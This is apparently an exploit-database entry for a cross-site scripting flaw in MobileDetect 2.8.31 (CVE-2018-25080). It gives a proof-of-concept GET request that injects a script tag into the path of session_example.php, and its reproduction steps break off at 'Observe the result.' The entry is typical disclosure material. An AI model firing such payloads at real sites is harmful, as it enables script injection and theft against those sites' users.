Share
## https://sploitus.com/exploit?id=PACKETSTORM:212389
# Exploit Title: MobileDetect 2.8.31 - Cross-Site Scripting (XSS)
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/
    # Software Link: https://github.com/serbanghita/Mobile-Detect/
    # Version: 4da80e5
    # Tested on: Windows
    # CVE : CVE-2018-25080
    
    Proof Of Concept:
    GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
    
    Steps to Reproduce
    1. Login as an admin user.
    2. Send the request.
    3. Observe the result: